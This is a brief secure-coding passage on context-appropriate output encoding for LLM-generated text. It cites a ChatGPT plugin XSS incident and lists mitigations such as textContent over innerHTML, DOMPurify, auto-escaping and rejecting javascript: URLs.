“Implement proper output encoding when data is returned to users, especially when passing data to interpreters.” Encoding must be context-appropriate: HTML encoding for web pages, URL encoding for query strings, JavaScript encoding for inline scripts (which should be avoided where possible).

The ChatGPT plugin XSS (Imperva, 2023) succeeded because LLM output was inserted into the DOM without HTML encoding. The fix was straightforward — use textContent instead of innerHTML, or run output through a sanitizer like DOMPurify — but it wasn’t in place at launch. One missing encode() call was the entire attack surface.

→ HTML: escape &, <, >, ", ' before inserting into the DOM
→ DOM: use element.textContent not innerHTML for LLM text
→ Rich HTML allowed: run output through DOMPurify or equivalent allowlist sanitizer
→ Server-side: use your framework’s auto-escape (Jinja2 with autoescape, React JSX, etc.)
→ URL context: validate scheme; reject javascript: and data: URLs

Grep your codebase for innerHTML, dangerouslySetInnerHTML, v-html, and Jinja2 | safe filters. Any of these applied to LLM output is a candidate vulnerability.